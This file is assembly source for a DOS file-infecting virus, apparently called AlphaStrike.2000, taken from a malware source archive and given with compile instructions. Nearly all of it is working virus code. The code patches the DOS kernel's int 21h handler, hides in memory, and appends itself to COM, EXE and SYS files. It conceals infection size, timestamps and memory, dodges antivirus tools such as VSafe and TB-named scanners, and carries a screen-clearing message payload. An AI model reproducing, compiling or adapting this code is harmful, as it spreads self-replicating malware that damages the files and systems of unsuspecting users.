MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.alpha.asm

891 lines
20 KiB
NASM
Raw Normal View History

2021-01-12 23:29:01 +00:00
; AlphaStrike.2000 or whatever its called by Neurobasher. disasm by retch.
; there are no comments. there are no need for comments unless you are lame.
;
; GREETZ R LAYME SO I WEEL NOT DO NE.
;
; 2 COMPYLE:
; tasm /m alpha.asm (EYE UZED FORE DOT SOMETHING)
; tlink alpha.obj (umm... 2.xx)
; exe2bin alpha.exe alpha.com
;
; i am contactable via retro@pcscav.com
.model tiny
.code
.286
virus_start: mov di, 0F242h
mov si, word ptr ds:[2h]
sub si, di
cmp si, 1000h
call getip
getip: mov bp, sp
mov bp, [bp]
cld
mov ax, 4458h
int 21h
jb checkifdosinhma
mov ds, es:[bx+0Eh]
mov si, 0Bh
jmp addressatSI
sysentry: pushf
pusha
push ds
push es
jmp virus_start
checkifdosinhma:mov ax, 3306h
int 21h
cmp al, 6
jnz checkdosversion
cmp dh, 10h
jnz go_abortinstall
mov ax, 0FFC4h
jmp compareints
checkdosversion:mov ah, 30h
int 21h
xchg al, ah
cmp ax, 31Eh
mov ax, 1Bh
jb go_abortinstall
compareints: mov cx, 0Ah
mov ds, cx
mov es, cx
mov si, 14h
mov bx, si
lea di, [bx+si]
cmpsw
jnz abortinstall
cmpsw
go_abortinstall:jnz abortinstall
lds si, [bx]
add si, ax
cmp al, 1Bh
jz checkifkernelpatched
mov si, [si+8]
addressatSI: lds si, [si]
checkifkernelpatched:
cmp byte ptr [si], 0EAh
jz abortinstall
mov cs:[bp+(kernaladdress )-getip], si
mov cs:[bp+(kernaladdress+2)-getip], ds
call getmemory
jnz abortinstall
lea si, [bp+(virus_start)-getip]
push cs
pop ds
mov es, cx
mov cx, offset header
rep movsb
sub ax, ax
mov cl, 0C0h
rep stosb
mov di, offset newint21
mov es:[di+1], al
lds si, ds:[bp+(kernaladdress)-getip]
mov ax, [si]
mov cl, 6Ch
mov bx, 6
cmp al, 0FAh
jz patchkernel
mov bl, 7
cmp al, 2Eh
jz patchkernel
mov cl, 69h
mov bl, 5
cmp al, 80h
jnz abortinstall
patchkernel: mov es:[di+savecmp-newint21], cl
add bx, si
mov es:[di+kernaladdress-newint21], bx
mov byte ptr [si], 0EAh
mov [si+1], di
mov [si+3], es
abortinstall: pop ax
sub si, si
mov ax, ss
cmp ah, 90h
jz restoresys
mov ah, 62h
int 21h
push bx
mov ds, bx
mov cx, [si+2Ch]
jcxz restorehost
mov ds, cx
mov ch, 8
findcomspec: cmp word ptr [si], 4F43h
jnz keeplooking
cmp word ptr [si+6], 3D43h
jz foundcomspec
keeplooking: inc si
loop findcomspec
jmp restorehost
foundcomspec: mov ax, 3D00h
lea dx, [si+8]
int 21h
xchg ax, bx
mov ah, 3Eh
int 21h
restorehost: pop ax
mov ds, ax
mov es, ax
add ax, 10h
mov bx, ax
db 81h,0C3h
savess dw 0FFF0h
cli
db 0BCh
savesp dw 0FFFEh
mov ss, bx
db 5
savecs dw 0FFF0h
mov cs:[bp+jumpsegment-getip], ax
cmp sp, 0FFFEh
jnz zeroregs
mov word ptr ds:100h, 20CDh
first2 = $-2
mov byte ptr ds:102h, 90h
next1 = $-1
zeroregs: sub ax, ax
sub bx, bx
sub cx, cx
cwd
sub si, si
sub di, di
sub bp, bp
sti
jmp near ptr jumptohost
db 0EAh
jumptohost db 0EAh
saveip dw 100h
jumpsegment dw 0
restoresys: pop es
pop ds
mov word ptr [si+8], 0
sysret2 = $-2
popa
popf
db 68h
sysret dw 0
ret
getmemory: call getlastmcb
mov ax, ds
mov bx, [si+3]
sub bx, dx
add ax, bx
xchg ax, cx
xchg ax, bx
jmp setnewmcbsize
setlastmcbsize: call getlastmcb
dec ax ; ax=cs
mov cx, ax ; cx=ax
sublastmcbseg: sub ax, bx ; ax=ax-lastmcbseg
setnewmcbsize: dec ax
or di, di
jnz dontsetmcbsize
mov [si+3], ax
dontsetmcbsize: ret
modifytomseginpsp:
mov ah, 62h
int 21h
mov ds, bx
int 12h
shl ax, 6
sub ax, 87h
mov ds:2, ax
hideourmem: call getlastmcb
add ax, dx ; ax=virusparasize+virusseg+1
jmp sublastmcbseg
getlastmcb: push es
mov ah, 52h
int 21h
mov ds, es:[bx-2]
mov ax, 5802h
int 21h
cbw
push ax
mov ax, 5803h
mov bx, 1
int 21h ; set umb's as part of chain
sub si, si
mov di, si
getlastmcbloop: call getnextmcb
jnz getlastmcbloop
pop bx
push ax
mov ax, 5803h
int 21h
pop bx
pop es
mov ax, cs
inc ax
mov dx, 87h ; 2160d / 10h
ret
getnextmcb: cmp word ptr [si+10h], 20CDh
jnz checkiflast
cmp byte ptr [si+15h], 0EAh
jnz checkiflast
inc di
checkiflast: cmp byte ptr [si], 5Ah ; 'Z'
jz islastblock
mov ax, ds
inc ax
add ax, [si+3]
mov ds, ax
islastblock: ret
newint21: db 0EBh
virusactive db 4Ch
mov cs:saveds, ds
push cs
pop ds
mov savedi, di
mov di, offset saveds
mov byte ptr [di+virusactive-saveds], 4Ch
mov [di+savees-saveds], es
mov [di+saveax-saveds], ax
mov [di+savebx-saveds], bx
mov [di+savecx-saveds], cx
mov [di+savedx-saveds], dx
mov [di+savesi-saveds], si
mov [di+savebp-saveds], bp
push cs
pop es
mov di, offset functions
db 0B9h
stealthmode dw 14h
xchg al, ah
xor al, 5Fh
cld
repne scasb
jnz exithandler
sub di, offset functions+1
shl di, 1
add di, offset functionoffsets
push offset exithandler
push word ptr [di]
jmp near ptr restoreregs
exithandler: call restoreregsandsetvirusactive
emulateoldkernal:
cmp ah, 6Ch
savecmp = $-1
ja zeroal_iret
cli
db 0EAh
kernaladdress dd 0FDC840FEh
writeheader: mov ah, 40h
mov cx, 18h
readwritefromsi:mov dx, si
int21: cli
pushf
call cs:kernaladdress
ret
zeroal_iret: mov al, 0
iret
restoreregsandsetvirusactive:
call near ptr restoreregs
setvirusactive: mov cs:virusactive, 0
ret
memstealth: call setlastmcbsize ; 48h/49h/4Ah
restoreregs: db 0B8h
saveds dw 9850h
mov ds, ax
db 0B8h
savees dw 6D8h
mov es, ax
db 0B8h
saveax dw 4B00h
db 0BBh
savebx dw 241h
db 0B9h
savecx dw 209h
db 0BAh
savedx dw 40E6h
db 0BEh
savesi dw 0E4h
db 0BFh
savedi dw 0
db 0BDh
savebp dw 6914h
ret
loc_0_272: mov dx, 3F5h
mov al, 4
mov ch, 4
out dx, al
loop $
mov ch, 4
out dx, al
loop $
in al, dx
test al, 40h
ret
message db 002h,0E0h,052h,0BFh,0B4h,0B0h,0B8h,0BFh,0E0h,0ADh
db 0ACh,0AEh,0B7h,0B5h,0BBh,051h,0E0h,007h,0E0h,0BFh
db 09Ch,08Ah,09Fh,092h,09Dh,09Bh,09Ch,0E0h,0ACh,09Fh
db 09Dh,08Ch,097h,09Dh,09Fh,094h,0E0h,0AAh,097h,08Eh
db 09Fh,094h,0E0h,0B7h,093h,090h,094h,09Fh,092h,08Ch
db 0E0h,09Eh,087h,0E0h,0B2h,0BBh,0ABh,0AEh,0B1h,0BEh
db 0BFh,0ADh,0B8h,0BBh,0AEh,0D9h,0C7h,0CDh,0E0h,0D1h
db 0E0h,0B9h,09Bh,08Eh,093h,09Fh,092h,087h,0E0h,002h
setnofilestealth:
mov byte ptr cs:stealthmode, 12h
activate: ret
call clearscreen
mov ah, 2
mov bh, 0
mov dx, 0C00h
int 10h
mov si, offset message
mov cx, 4Eh
displayloop: lods byte ptr cs:[si]
neg al
int 29h
loop displayloop
xor ax, ax
int 16h
clearscreen: mov ax, 3
int 10h
setnoactivate: mov byte ptr cs:activate, 0C3h
ret
execute: call setfullstealth
call setnoactivate
cmp al, 1
mov al, 90h
call setdirstealth
jnz infectdx
mov ax, 3D02h
int 21h
jb ret3
xchg ax, bx
call disinfecthandle
mov ah, 3Eh
int 21h
mov byte ptr ds:activate, 90h
ret3: ret
infectsi: mov dx, si
infectdx: cmp ax, 4300h
jz ret3
call sethandletozero
cmp ah, 3Dh
jnz dontsetfullstealth
call setfullstealth
dontsetfullstealth:
mov si, dx
mov di, offset buffer
push cs
pop es
copyname: lodsb
or al, al
jz namecopied
stosb
jmp copyname
namecopied: stosb
mov cl, byte ptr cs:saveax+1
mov ax, [si-7]
mov bx, [si-0Bh]
cmp cl, 3Dh
jnz notopen
db 0EBh
dontopenchklist db 16h
cmp ax, 5453h ; chkliST?
jnz notopen
cmp bx, 4B48h ; cHKlist?
jnz notopen
pop ax
call restoreregsandsetvirusactive
mov ax, 2
stc
retf 2
notopen: cmp cl, 4Bh
jnz checkifavactive
mov cl, 16h
cmp ax, 5641h
jnz notmsavorcpav
mov cl, 0
notmsavorcpav: mov cs:dontopenchklist, cl
cmp bx, 5343h
jz setmemstealthonly
cmp bx, 4142h
jz setmemstealthonly
cmp ax, 4148h
jz setmemstealthonly
cmp ax, 4A52h
jz setmemstealthonly
cmp word ptr [si-8], 495Ah
jnz leavestealthmode
setmemstealthonly:
mov byte ptr cs:stealthmode, 8
leavestealthmode:
push ax
mov ax, 160Ah
int 2Fh
cmp al, 0Ah
pop ax
jnz checkifavactive
cmp ax, 5641h
jz checkifavactive
cmp bx, 544Eh
jz checkifavactive
call hideourmem
checkifavactive:
mov bx, 0FF0Fh
xchg ax, bx
int 21h
cmp al, 1
jz ret4
mov bl, 0
call vsafe
push cs
pop ds
mov ah, 2Fh
int 21h
push es
push bx
mov ah, 1Ah
mov dx, offset tempdta
int 21h
mov ax, 3524h
int 21h
push es
push bx
mov ah, 25h
mov dx, offset zeroal_iret
int 21h
mov ah, 4Eh
mov cl, 27h
call setdxtobuffer_int21
jb restoreint24anddta
mov si, offset header
sub di, di
mov al, [si+18h]
mov attribs, al
cmp byte ptr [si], 2
ja notdriveAorB
call loc_0_272
jz checkfiletype
restoreint24anddta:
mov ax, 2524h
pop dx
pop ds
int 21h
mov ah, 1Ah
pop dx
pop ds
int 21h
togglevsafe db 0B3h
vsafestatus db 16h
vsafe: mov ax, 0FA02h
mov dx, 5945h
int 16h
mov cs:vsafestatus, cl
ret4: ret
notdriveAorB: cmp [si+12h], di
jnz checkfiletype
cmp word ptr [si+10h], 2
jb restoreint24anddta
cmp byte ptr [si], 3
jb checkfiletype
mov ah, 2Ah
int 21h
sub cx, 7BCh
mov ax, [si+1Bh]
shr ax, 1
cmp ah, cl
jnz checkfiletype
shr ax, 4
and al, 0Fh
cmp al, dh
jz restoreint24anddta
checkfiletype: mov bp, offset setcarry_ret
cmp word ptr [si+21h], 4254h ; TB*
jz restoreint24anddta
cmp word ptr [si+0Ch], 4F43h ; CO
jnz notcominfection
mov bp, offset infectcom
notcominfection:cmp word ptr [si+1Eh], 0Bh
jb restoreint24anddta
cmp byte ptr [si+1Ch], 0C8h
jnb restoreint24anddta
mov al, [si+18h]
and al, 7
jz attributesok
sub cx, cx
call setattribs
jb restoreint24anddta
attributesok: mov ax, 3D02h
call setdxtobuffer_int21
jb near ptr restoreattribs
xchg ax, bx
mov ah, 3Fh
mov cx, 19h
call readwritefromsi
mov ax, [si]
xchg al, ah
cmp ax, 4D5Ah
jnz notexeinfection
mov bp, offset infectexe
jmp notsysinfection
notexeinfection:cmp ax, 0FFFFh
jnz notsysinfection
mov bp, offset infectsys
notsysinfection:call bp
jb dontwriteheader
call writeheader
dontwriteheader:mov ax, 5700h
mov cx, [si+19h]
mov dx, [si+1Bh]
inc ax
int 21h
mov ah, 3Eh
int 21h
restoreattribs db 0B1h
attribs db 20h
call setattribs
jmp restoreint24anddta
setattribs: mov ax, 4301h
setdxtobuffer_int21:
mov ch, 0
mov dx, offset buffer
jmp int21
infectexe: cmp byte ptr [si+18h], 40h ;WINDOZE EXE ?
jz setcarry_ret
mov ax, [si+4]
dec ax
mov cx, 200h
mul cx
add ax, [si+2]
adc dx, di
cmp [si+1Dh], ax
jnz setcarry_ret
cmp [si+1Fh], dx
jz nointernaloverlays
setcarry_ret: stc
ret
nointernaloverlays:
mov ax, [si+0Eh]
mov ds:savess, ax
mov ax, [si+10h]
mov ds:savesp, ax
mov ax, [si+16h]
mov ds:savecs, ax
mov ax, [si+14h]
mov ds:saveip, ax
call appendvirus
jb exitinfectexe
mov ax, [si+8]
mov cl, 10h
mul cx
neg ax
not dx
add ax, [si+1Dh]
adc dx, di
add dx, [si+1Fh]
div cx
mov [si+16h], ax
mov [si+14h], dx
dec ax
mov [si+0Eh], ax
mov word ptr [si+10h], 9D2h
add word ptr [si+0Ah], 0ADh
mov ax, [si+1Dh]
mov dx, [si+1Fh]
add ax, virussize
adc dx, di
mov cx, 200h
div cx
inc ax
mov [si+4], ax
mov [si+2], dx
clc
exitinfectexe: ret
infectcom: cmp word ptr [si+1Eh], 0D6h
ja exitcominfect
mov ax, [si]
mov word ptr ds:first2, ax
mov al, [si+2]
mov byte ptr ds:next1, al
mov ax, 0FFF0h
mov ds:savecs, ax
mov ds:savess, ax
mov word ptr ds:saveip, 100h
mov word ptr ds:savesp, 0FFFEh
call appendvirus
jb exitcominfect
mov byte ptr [si], 0E9h
mov ax, -3 ;0FFFDh
add ax, [si+1Dh]
mov [si+1], ax
clc
exitcominfect: ret
infectsys: mov ax, [si+8]
mov word ptr ds:sysret, ax
mov word ptr ds:sysret2, ax
call appendvirus
jb ret5
mov ax, [si+1Dh]
add ax, offset sysentry
mov [si+8], ax
clc
ret5: ret
appendvirus: mov al, 2
call lseek
mov ah, 40h
mov cx, virussize
cwd
call int21
cmp ax, cx
stc
jnz ret1
add byte ptr [si+1Ch], 0C8h
lseekstart: mov al, 0
lseek: mov ah, 42h
cwd
mov cx, dx
doint21: int 21h
ret1: ret
lseekbeforeend: mov ax, 4202h
mov cx, 0FFFFh
jmp doint21
checkhandle: cmp bl, 5 ;LAME HANDLE CHEQ.
jb exittimestealth
checkinfection: mov ax, 5700h
int 21h
jb exittimestealth
cmp dh, 0C8h
exittimestealth:ret
blocklseek: cmp al, 2
jnz ret1
call checkinfection
jb ret1
pop ax
call near ptr restoreregs
push cx
sub dx, virussize
sbb cx, 0
int 21h
pop cx
jmp setvirusactive_exit
setnodirstealth:mov al, 0C3h
setdirstealth: mov byte ptr cs:fcbdirstealth, al
ret
fcbdirstealth: nop
inc sp
inc sp
int 21h
cmp al, 0FFh
jz setvirusactive_exit
pushf
push ax
call getdta
cmp byte ptr [bx], 0FFh
jnz notextended
add bx, 7
notextended: cmp [bx+1Ah], al
jb exitdirstealth
sub [bx+1Ah], al
add bx, 3
jmp stealthdirsize
getdta: mov ah, 2Fh
int 21h
mov al, 0C8h
push es
pop ds
ret
asciidirstealth:inc sp
inc sp
int 21h
jb setvirusactive_exit
pushf
push ax
call getdta
cmp [bx+19h], al
jb exitdirstealth
sub [bx+19h], al
stealthdirsize: cmp word ptr [bx+1Bh], 0Bh
jb exitdirstealth
sub word ptr [bx+1Ah], virussize
sbb word ptr [bx+1Ch], 0
exitdirstealth: call restoreregs
pop ax
popf
setvirusactive_exit:
call setvirusactive
jmp exitkeepflags
readoldheader: mov al, 1
call lseek
push cs
pop ds
mov oldposlo, ax
mov oldposhi, dx
mov si, offset header
cmp handle, bl
jz ret0
mov dx, 0FFDFh
call lseekbeforeend
mov ah, 3Fh
mov cx, 21h
call readwritefromsi
mov handle, bl
lseektooldpos: mov ax, 4200h
db 0B9h
oldposhi dw 0
db 0BAh
oldposlo dw 0
int 21h
ret0: ret
disinfecthandle:call checkhandle
jb ret0
push cx
push dx
call readoldheader
call lseekstart
call writeheader
mov dx, 0F830h ; -virussize
call lseekbeforeend
mov ah, 40h
sub cx, cx
int 21h
pop dx
pop cx
sub dh, 0C8h
mov ax, 5701h
int 21h
jmp lseektooldpos
stealthread: mov bp, cx
call checkhandle
jb ret0
pop ax
call readoldheader
sub ax, [si+1Dh]
sbb dx, 0
sub dx, [si+1Fh]
js adjustread
call restoreregsandsetvirusactive
sub ax, ax
clc
exitkeepflags: retf 2
adjustread: add ax, bp
adc dx, 0
jnz bigread
sub bp, ax
bigread: push bp
call near ptr restoreregs
pop cx
int 21h
pushf
push ax
jb exitstealthread
push ds
pop es
mov di, dx
push cs
pop ds
mov si, offset header
cmp oldposhi, 0
jnz exitstealthread
mov ax, oldposlo
cmp ax, 18h
jnb exitstealthread
add si, ax
add cx, ax
cmp cx, 18h
jbe moveit
sub ax, 18h
neg ax
xchg ax, cx
moveit: cld
rep movsb
exitstealthread:call restoreregsandsetvirusactive
pop ax
popf_exitwithflags:
popf
jmp exitkeepflags
gettimestealth: cmp byte ptr cs:stealthmode, 12h
jnz dotimestealth
cmp al, 0
jz ret2
setfullstealth: mov byte ptr cs:stealthmode, 14h
ret
dotimestealth: cmp al, 0
jnz settimestealth
inc sp
inc sp
int 21h
pushf
jb setvirusactive_exit1
call removemarkerfromdh
setvirusactive_exit1:
call setvirusactive
jmp popf_exitwithflags
settimestealth: call setfullstealth
mov ax, 5700h
int 21h
jb ret2
pop ax
cmp dh, 0C8h
call near ptr restoreregs
jb removemarkeranddoint21
cmp dh, 0C8h
jnb doint21andexit
add dh, 0C8h
doint21andexit: int 21h
pushf
jmp setvirusactive_exit1
removemarkeranddoint21:
call removemarkerfromdh
jmp doint21andexit
removemarkerfromdh:
cmp dh, 0C8h
jb notmarked
sub dh, 0C8h
notmarked: ret
sethandletozero:mov cs:handle, 0
ret2: ret
; NOTE : ALL FUNKTIONZ ARE XORED WITH 5Fh
functions db 013h ; 4Ch - prog terminate
db 017h ; 48h - create mem block
db 016h ; 49h - release memory
db 015h ; 4Ah - resize mem block
db 00Dh ; 52h - get SYSVARS
db 0B5h ; 0EAh - ALLOC HUGE SEG
db 06Dh ; 32h - GET DPB
db 014h ; 4Bh - program EXEC
db 062h ; 3Dh - open file
db 04Eh ; 11h - fcb FindFirst
db 04Dh ; 12h - fcb FindNext
db 011h ; 4Eh - ASCII FindFirst
db 010h ; 4Fh - ASCII FindNext
db 008h ; 57h - get/set file time
db 033h ; 6Ch - extended open
db 01Ch ; 43h - get/set attribs
db 061h ; 3Eh - handle close
db 01Fh ; 40h - handle write
db 01Dh ; 42h - lseek
db 060h ; 3Fh - handle read
functionoffsets dw offset setnofilestealth
dw offset memstealth
dw offset memstealth
dw offset memstealth
dw offset hideourmem
dw offset modifytomseginpsp
dw offset setnodirstealth
dw offset execute
dw offset infectdx
dw offset fcbdirstealth
dw offset fcbdirstealth
dw offset asciidirstealth
dw offset asciidirstealth
dw offset gettimestealth
dw offset infectsi
dw offset infectdx
dw offset sethandletozero
dw offset disinfecthandle
dw offset blocklseek
dw offset stealthread
header db 0CDh,020h,090h
tempdta db 3Ch dup (0)
buffer db 80h dup (0)
handle db 0
virussize = 7D0h
end virus_start